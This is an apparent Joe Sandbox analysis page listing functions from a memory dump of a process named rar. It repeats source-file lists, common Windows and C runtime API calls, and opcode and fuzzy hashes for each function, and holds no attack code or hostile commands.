                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                            • Instruction ID: 23a12e08778a9b31063482101191170db2fe87e17cf4f28f3b0db48e1f920d01
                                                            • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                            • Instruction Fuzzy Hash: C6E01A34F0CB26C2EB547B609882779E352AF95761F40543CCC0E02392FE3DA40C8A60
                                                            Function 00007FF71D2D4044 Relevance: 3.3, APIs: 2, Instructions: 336COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CharEnvironmentExpandStrings
                                                            • String ID:
                                                            • API String ID: 4052775200-0
                                                            • Opcode ID: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
                                                            • Instruction ID: cdc05dd6ccd5194feae4d129bc8eb2236aca15985201aec31d0a8d31a1655302
                                                            • Opcode Fuzzy Hash: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
                                                            • Instruction Fuzzy Hash: 96E1D723A1CE8285EB60AB64D4201FDE760FB917A4F944131DBAD076D9EF7CD58ACB10
                                                            Function 00007FF71D2D1AF0 Relevance: 3.1, APIs: 2, Instructions: 85fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF71D2C7EBE,00000000,00000000,00000000,00000000,00000007,00007FF71D2C7C48), ref: 00007FF71D2D1B8D
                                                            • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF71D2C7EBE,00000000,00000000,00000000,00000000,00000007,00007FF71D2C7C48), ref: 00007FF71D2D1BD7
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                            • Instruction ID: dc0346ffafd81fa4719532f864378fd6690a9259c5d1d1d5afcd6a4f74a4a9eb
                                                            • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                            • Instruction Fuzzy Hash: B5312873A1CE8586F730AF10E4153A9A6A0EB50B78F904334D9BC06AC5FF7CC4898B60
                                                            Function 00007FF71D2B681C Relevance: 3.1, APIs: 2, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 932687459-0
                                                            • Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                            • Instruction ID: ae8ce0ac1e0e10a1f85aa80333a326fa99f516a6a4626347ca0446deafd563ab
                                                            • Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                            • Instruction Fuzzy Hash: 7321C46390CF8582EB119F29D1410B8A360FB9CB98B58A321DF5D03616EF28E1E9C700
                                                            Function 00007FF71D2E915C Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 16b2a8006f7396a77cc468de0c3eb669dd52c88d84059797fb67b2da720282ec
                                                            • Instruction ID: 781d33b07046c623d6af709c54cebed70190585261899052d24a27cdd5f9dbfc
                                                            • Opcode Fuzzy Hash: 16b2a8006f7396a77cc468de0c3eb669dd52c88d84059797fb67b2da720282ec
                                                            • Instruction Fuzzy Hash: 5D11D33260DF8281EA10FB54A5003A9F2A4EF897A0F944239D6AD477E6EE7CD415CB20
                                                            Function 00007FF71D2D20B4 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                            • Instruction ID: 71499ecba9a28754750e4fb3bd2bf7281b7a224bcf8736d1f4e3db4dcd29ff9d
                                                            • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                            • Instruction Fuzzy Hash: F8010A32E1CE5181EA645B25A550128E251AF95BB0FA49230DA7D03BD5EF3CD4498F10
                                                            Function 00007FF71D2C7A68 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • setbuf.LIBCMT ref: 00007FF71D2C7A7B
                                                              • Part of subcall function 00007FF71D312AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71D317EF3
                                                            • setbuf.LIBCMT ref: 00007FF71D2C7A8F
                                                              • Part of subcall function 00007FF71D2C7B44: GetStdHandle.KERNEL32(?,?,?,00007FF71D2C7A9E), ref: 00007FF71D2C7B4A
                                                              • Part of subcall function 00007FF71D2C7B44: GetFileType.KERNELBASE(?,?,?,00007FF71D2C7A9E), ref: 00007FF71D2C7B56
                                                              • Part of subcall function 00007FF71D2C7B44: GetConsoleMode.KERNEL32(?,?,?,00007FF71D2C7A9E), ref: 00007FF71D2C7B69
                                                              • Part of subcall function 00007FF71D312ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71D312AD0
                                                              • Part of subcall function 00007FF71D312B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71D312C1C
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                            • String ID:
                                                            • API String ID: 4044681568-0
                                                            • Opcode ID: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                            • Instruction ID: 137877a5795529a2fd1fccc32ebfbe5efc537751224e6e7bba554758f0780a42
                                                            • Opcode Fuzzy Hash: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                            • Instruction Fuzzy Hash: 8301D764E2D9839AFA58B37558A27B9D4428F91330FC0817CE52E0B2D3FD5C680E8B71
                                                            Function 00007FF71D2D2440 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                            • Instruction ID: 28ca80d1b1498a0f7e65d92a11dd077a11c7893a6b6f63416dadb7c5d6dcc00c
                                                            • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                            • Instruction Fuzzy Hash: 4201A132A1CE4281EB64AB29E484279E360EF41B78F944335D63D021E5EF3CD58ECB20
                                                            Function 00007FF71D2D30C8 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(00000800,00007FF71D2D305D,?,?,?,?,?,?,?,?,00007FF71D2E4126,?,?,?,?,00000800), ref: 00007FF71D2D30F0
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF71D2E4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF71D2D3119
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                            • Instruction ID: 595b6adc11eab3627ef7e0286a7f4a58dafa00f051e56174a2552f4e0ccb20bf
                                                            • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                            • Instruction Fuzzy Hash: C8F0A431B1CEC181EA60AB24F4553A9E350BB4D7E4F800134E9DC83799EE6CD58D8E10
                                                            Function 00007FF71D2FB3F0 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1175261203-0
                                                            • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                            • Instruction ID: e192755a12dcab6d8b7c8429ab1bd1fddcb2526c7bd8845b32e7406519c42616
                                                            • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                            • Instruction Fuzzy Hash: 16F0FF35B1C98186F660AB20E8153E6E264BB9C794FC04535E9DD82699FE2CD649CE20
                                                            Function 00007FF71D2FBA70 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1231390398-0
                                                            • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                            • Instruction ID: 33e7a2d93e5e88d0337ecf8cf5ef428326f3422630c7a06b1031c47f93d547fc
                                                            • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                            • Instruction Fuzzy Hash: 4DE06561B3895186DBD867199496FA99391AB54B80FC06039E41A83A54FD1DD54C8F10
                                                            Function 00007FF71D314A74 Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                            • String ID:
                                                            • API String ID: 588628887-0
                                                            • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                            • Instruction ID: 89772c389bb72925261eb32b614fbe3a1521528a8d79493da69b754f07a476f9
                                                            • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                            • Instruction Fuzzy Hash: 37E046B1E1D943C2FE59BBB2A804174D3916F48B60F98843CD90D46252FE2CA44D8A64
                                                            Function 00007FF71D2F71FC Relevance: 1.9, APIs: 1, Instructions: 353COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c3432b9c8060d01ce72343edc576a4dccd09043a68da9ff68992643fd273dc9a
